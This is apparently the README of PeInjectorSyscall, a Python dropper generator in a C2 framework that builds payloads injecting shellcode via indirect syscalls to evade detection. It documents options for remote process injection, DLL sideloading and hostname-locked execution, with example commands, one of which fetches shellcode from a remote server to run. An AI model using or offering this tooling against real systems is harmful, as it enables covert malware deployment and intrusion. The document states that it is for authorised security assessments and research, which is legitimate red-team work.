PeInjectorSyscall is a Python-based dropper generator that creates payloads capable of injecting shellcode using indirect syscalls. It supports both self-injection and remote process injection, with shellcode sourced from a URL or generated using Donut.

This dropper is integrated as a module in the Exploration C2 framework.

• Shellcode injection using indirect syscalls for stealth
• Self-injection or remote process injection
• Shellcode fetched from remote URLs or generated from executables
• Supports DLL sideloading using export metadata
• Hostname-based execution restriction

PeInjectorSyscall.py [options]

• -h, --help Show this help message and exit.

• -p, --process <name/self> Target process to inject the shellcode into. Use "self" to inject into the current process.

• -u, --url <url> URL to fetch the shellcode from (e.g., http://server/shellcode.bin).

• -b, --binary <path> Path to a binary file that will be converted into shellcode using Donut.

• -a, --args <arguments> Command-line arguments to pass to the binary during shellcode creation.

• -r, --rawShellcode <path> Use a raw shellcode file instead of generating one with Donut.

• -t, --targetHost <hostname> Restrict the dropper to run only on the specified host (hostname match).

• -s, --sideDll <path> Path to a DLL used to extract export table and metadata to create a side-loadable DLL.

• -d, --SideDllPathOnHostSystem <path> Path where the original DLL resides on the host system for DLL sideloading.

# Generate a dropper that injects into itself using shellcode from a URL
PeInjectorSyscall.py -p self -u http://192.168.1.10/shellcode.bin

# Generate a dropper that injects into notepad.exe using shellcode from a binary
PeInjectorSyscall.py -p notepad.exe -b ./calc.exe

# Generate a dropper that only runs on a specific host and uses DLL sideloading
PeInjectorSyscall.py -p self -r ./payload.raw -t TARGET-HOST -s ./template.dll -d C:\Windows\System32\template.dll

• Either --binary or --rawShellcode must be provided, but not both.
• DLL sideloading is optional but allows for stealthier deployments.
• The Donut tool must be available if using --binary to generate shellcode.

This tool is intended for authorized security assessments and research only. Unauthorized use is strictly prohibited.